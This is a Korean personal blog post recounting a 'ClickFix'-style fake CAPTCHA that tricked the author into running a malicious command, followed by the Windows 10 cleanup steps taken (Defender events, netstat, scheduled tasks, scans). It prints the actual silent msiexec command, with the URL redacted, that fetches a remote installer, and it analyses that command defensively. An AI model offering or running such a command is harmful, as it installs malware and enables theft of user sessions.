배경

• 윈도우10에서 보안 점검을 정리하는 시간을 갖습니다.
• 실수로 윈도우10에서 악성파일을 다운로드하였는데요, 대처 방법을 얕게 나마 알아보겠습니다.
• 출처가 없는 정보는 GPT를 통해 알아본 정보입니다. 교차 검증이 필요합니다.

관련 개념

window Run Dialog

• Win + R키를 누르면 실행되는 프로그램입니다.
• 실행창이라고도 불립니다.
• 명령어를 입력하여 다양한 프로그램과 시스템 도구를 빠르게 실행할수 있습니다.
• Ctrl + Shift + Enter를 사용하면 관리자 권한으로 프로그램을 실행할수 있습니다.

Administrator Privileges

• 특정 작업을 수행할 수 있는 높은 수준의 시스템 권한을 의미합니다.
• 관리자 권한을 가진 사용자와 관리자 계정(Administrator Account)는 다른 개념입니다.
  • 관리자 계정은 기본적으로 모든 작업을 수행할 수 있는 반면, 표준 사용자는 시스템 변경 작업을 수행할 때마다, UAC 창이 뜨며 관리자 계정의 비밀번호 입력이 필요할수 있습니다.
  • 관리자 계정이라해도 모든 프로그램이 자동으로 관리자 권한으로 실행되지 않으며, 일부 작업은 수동으로 관리자 권한으로 실행해야합니다.

예시

• cmd에서 시스템 파일수정
• regedit 실행
• 프로그램을 C:\Program Files에 설치 또는 변경
• 윈도우 서비스 설정 변경(services.msc)
• 방화벽 설정 변경

Event Viewer

• 시스템에서 발생하는 다양한 이벤트(오류, 경고, 정보 로그)를 기록하고 분석할 수 있는 도구 입니다.
• 실행창에서 eventvwr.msc을 입력하면 실행할수 있습니다.
• 주요 기능은 다음과 같습니다.
  • 윈도우 시스템 로그 확인
  • 프로그램 충돌 원인 분석
  • 보안 이벤트 추적
  • 서비스 및 드라이버 문제 진단
• 여러가지 로그를 기록하며, 주요 로그는 다음과 같습니다.
  • 응용 프로그램
    • 프로그램 실행 관련 이벤트
  • 보안
    • 로그인/로그아웃,권한 변경, 계정 관리 등 보안 이벤트
  • 시스템
    • 윈도우 시스템 및 드라이버 관련 이벤트
  • 설정
    • 윈도우 업데이트 및 설치 관련 로그

Window defender

• 윈도우 시스템에 기본 내장된 바이러스 및 위협 방지 보안프로그램입니다.
• 다음 검사 옵션을 제공합니다.
  1. 빠른 검사
  2. 전체 검사
  3. 오프라인 검사

주요 기능

• 실시간 보호
  • 파일이 실행되거나 다운로드될 대 자동으로 검사하여 악성 코드 차단
  • 감염된 파일을 자동 격리 및 삭제
• 클라우드 기반 보호
  • 최신 위협 정보를 마이크로소프트 서버에서 바아와 신속한 탐지 수행
• 랜섬웨어 방지
  • 중요한 파일이 랜섬웨어 공격으로 암호화되는 것을 방지
  • 제어된 폴더 액세스 기능을 통해 중요한 파일 보호
• Windows 방화벽 통합
  • 네트워크 보안을 강화하여 외부 위협으로부터 PC를 보호
• 웹 보호
  • 피싱 및 악성 웹사이트 차단
• 오프라인 검사
  • 일반적인 방법으로 제거되지 않는 강력한 악성코드를 감지하고 제거
• 보안 센터 제공
  • 모든 보안 설정을 한 곳에서 관리 가능

Malwarebytes

• 멀웨어(악성코드), 랜섬웨어, 스파이웨어, 애드웨어 등을 탐지하고 제거하는 보안 소프트웨어입니다.
• 무료버전과 유료 버전을 제공합니다.
  • 무료버전은 수동검사 기능만 가능하며 실시간 보호 기능이 없습니다.
  • 유료버전은 실시간 보호, 웹 보호, 랜섬웨어방어 등의 기능을 제공합니다.
• 윈도우 디펜서와의 차이점
  • 다양한 위협을 더 효과적으로 탐지하여 멀웨어 탐지 성능이 더 강력합니다.
  • 실시간 보호기능이 윈도우 디펜더보다 더욱 강력합니다.
  • 실시간 보호 동작이 상대적으로 더 무겁습니다.
  • 최신 악성코드를 더 빠르게 탐지합니다.

Regedit

• 윈도우 레지스트리를 편집하는 레지스트리 편집기 도구입니다.
  • 윈도우에서 레지스트리는 운영체제와 응용 프로그램의 설정, 구성 정보를 저장하는 DB 역할을 합니다.
    • 프로그램 서정 변경, 서비스 관리, 성능 최적화 및 UI 변경, 보안 정책 조정 등의 정보를 갖고 있습니다.

Local Group Policy Editor

• 윈도우에서 시스템 설정과 사용자 계정의 동작을 세밀하게 제어할 수 있도록 해주는 관리 도구입니다.
• 실행창에 gpedit.msc를 입력하여 사용할수 있습니다.
• 윈도우 Pro, Enterprise, Education 에디션에서만 지원됩니다.

주요 기능

1. 보안 정책 관리
   • 비밀번호 정책
   • 계정 잠금 정책
2. 사용자 및 시스템제어
   • 특정 프로그램 실행 차단
   • 작업 관리자, 제어판, 레지스트리 편집기 등의 접근 제한
   • 윈도우 업데이트 설정 변경
3. 네트워크 및 스크립트 관리
   • 네트워크 공유 및 원격 데스크톱 정책 설정
   • 로그인 및 로그오프 시 실행할 스크립트 설정
4. 소프트웨어 및 하드웨어 제한
   • 특정 드라이브 접근 제한
   • USB 저장 장치 사용 금지

주의사항

• 신중히 값을 변경하지 않으면 시스템 오류가 발생할수 있습니다.
• 되돌릴 수 있도록 사전에 변경될 값을 백업해야합니다.
• 공식 문서 또는 신뢰할수 있는 정보 확인후에 수정해야합니다.
• 일부 악성 프로그램이 레지스트리를 변경할 수 있으므로, 악성코드를 주의해야합니다.

본론

상황 : 악성파일 다운로드

• Hexo 테마 에서 테마를 선택하기 위해 여러 웹사이트를 방문하는 중이었습니다.
• 맘에드는 테마 사이트를 방문했는데, BOT 예방 프로세스가 실행되었습니다. 캡차를 통과한 후, 실행창에서 어떤 명령어를 실행시키라는 것이었습니다.
• 바보같게도, 명령어를 제대로 확인하지 않고 실행시켜버렸습니다.
  • 수동 작업을 통해 사람임을 증명하는 프로세스로 착각했습니다.

악성코드 실행 명령어

• 실행한 명령어는 다음과 같습니다.
  • 절대 실행하지 마세요.!!!!

MSIEXEC vbqkao=csvgyo /q osxkrwiecb=aygkz -FVkvflthdm {https://이상한-사이트}

• 분석
  • MSIEXEC
    • msiexec.exe 윈도우 인스톨러 실행 파일입니다.
  • vbqkao=csvgyo 와 osxkrwiecb=aygkz
    • 표준 msiexec옵션이 아니라 랜덤한 문자열 또는 실행시 전달된 사용자 정의 매개 변수일 가능성이 있습니다.
  • /q
    • Quiet Mode 옵션으로 msiexec.exe가 UI 없이 조용히 실행됩니다.
  • -FVkvflthdm
    • 표준 msiexec옵션이 아니라 악성 코드 실행을 위한 인수일 가능성이 있습니다.
  • {https://이상한-사이트}
    • 원격에서 파일을 다운로드하려는 시도일 가능성이 높습니다.
    • 악성코드의 페이로드(실행파일 ,스크립트 등)을 가져오는 용도로 보입니다.
  • ygb=wuxaygnlc
    • 랜덤한 키-값 쌍처럼 보이며, 실행 환경에 따라 특정값이 필요할 수 있습니다.

대처

윈도우 디펜더 동작

• 브라우저가 해당 파일 다운로드가 완료 되었을 때, 윈도우 디펜더가 해당 파일의 위험성을 감지하고 삭제하였습니다.
• 악성 파일을 다운로드 했음을 깨닫고, 검사를 실행하였습니다.
• 빠른 검사를 실행한 뒤, 오프라인 검사를 실행하였습니다.
  • 전체 검사보다 속도가 빨라서 확인차 실행하였습니다.

수동 점검 절차

• 이후 GPT를 활용하여 다음 상황을 진행하였습니다.
  • 악성파일 흔적 확인
    • 다운로드 폴더 확인하여 해당 파일 존재여부 확인
  • 이상한 프로세스 확인
    • 작업 관리자를 통해 CPU 사용률이 높은 프로세스를 점검하였습니다.
  • 윈도우 디펜더 전체 검사 실행
    • 당일 밤부터 다음날 까지 전체 검사를 진행하였습니다.

상황2 : 취약점 점검 강화

• 상황1 이후 2가지 문제를 직면하였습니다.

1. 2~3일 후, 네이버 계정이 보호조치 상태가 되었음을 확인하였습니다. => 상황1의 연관성이 기반으로 추측하자면, 네이버 세션또는 쿠키 정보가 탈취당한 듯 싶습니다.
2. 전체검사가 12시간 이상 진행됨 => 컴퓨터 내부에 악성 파일이 남아있거나 상황1에의해 보안이 취약해져 잠재된 위험이 발생했다고 추정됩니다.

• 네이버와 다른 도메인 계정들 대부분 2차 인증을 필요로 하기 때문에, 세션 또는 쿠키 정보 탈취당해도 2차 인증이 필요합니다.
• 그래도 컴퓨터의 보안이 취약해졌을 수도 있기 때문에 점검을 하였습니다.

대처

윈도우 디펜더 이벤트 확인

• 이벤트 뷰어에서 응용 프로그램 및 서비스 로그 → Microsoft → Windows → Windows Defender → Operational 선택하여 Event ID 1116 그리고 Event ID 5007를 확인하였습니다.
  • 1116: Windows Defender가 위협을 감지한 기록
  • 5007: Windows Defender 설정이 변경된 기록
• 확인 결과, 악성 파일 다운로드 시점에 5007이벤트가 여러번 발생한 것을 확인할 수 있었습니다.
  • 특정 프로세스 또는 위치가 윈도우 디펜더 검사 대상에서 제외됨
  • 윈도우 디펜더의 일부 옵션이 disable 처리됨
• 로컬 그룹 정책 편집기를 사용하여
  • 변경된 윈도우 디펜더 설정을 다시 복원하였습니다.
  • 자동 제외 사용 등 악성 파일 검사에 불리한 설정을 사용하지 않도록 설정하였습니다.

네트워크 연결 확인

• powerShell에서 관리자권한으로 다음 명령어를 통해 수상한 네트워크 연결이 존재하는지를 확인하였습니다.

  netstat -ano | Select-String "ESTABLISHED"
  

  • https://www.whois.com/에서 각 IP가 신뢰할 수 있는 IP인지 확인하였습니다.
  • 네트워크 연결을 사용중인 프로세스의 PID를 점검하였습니다.

예약 작업 확인

• 악성파일이 부팅 또는 특정 조건 만족시 실행되도록 스케줄 등록이 되었는지 확인하였습니다
• powerShell에서 관리자 권한으로 다음 명령어를 실행하였습니다.

  Get-ScheduledTask | Where-Object {$_.TaskName -match "update|windows|system"} | Select-Object TaskName,TaskPath
  

  • 각 태스크가 신뢰할만한 회사에서 공식적으로 지원되는지 확인하였습니다.

타 백신 프로그램 사용

• Malwarebytes 무료버전을 설치하여 다시 한번 점검을 하였습니다.

윈도우 디펜더 전체 검사

• 컴퓨터에 연결된 외장 하드와 내장 SSD를 따로 따로 점검하였습니다.
  • 압축파일이 많고 용량이커서 상황1에서 전체검사가 오래걸리지 않았나 추측됩니다.
• 전체 검사가 끝날 때까지 무한정 대기
  • 이전 전체검사는 특정 프로세스 및 위치가 제외되었기 때문에 유효성이 낮습니다.
  • 이번에는 확실히 전체를 검사하기 위해 아무리 시간이 오래걸려도 대기하였습니다.

결론

• 실행창에서 명령어를 사용할때는 주의합시다.

• 내부 호스트를 외부와 접촉할 때는 무조건 신뢰할만한 외부와 접촉해야합니다.

• 보안 사고는 사건 발견 즉시 대처하고, 재검토 해야합니다.

  • 그로인해 시간도 많이 필요하네요.

• CS지식을 조금이나마 활용해볼 수 있어서 기쁩니다. 네트워크, 운영체제, 컴퓨터구조 등을 이번 기회에 사용해볼 수 있었습니다.

• process explorer라는 프로그램을 알 수 있어서 좋은 기회였습니다.

  • 실시간으로 윈도우 프로세스의 정보를 가독성있게 보여주는 프로그램입니다.
    • 작업 관리자보다 보기 편합니다.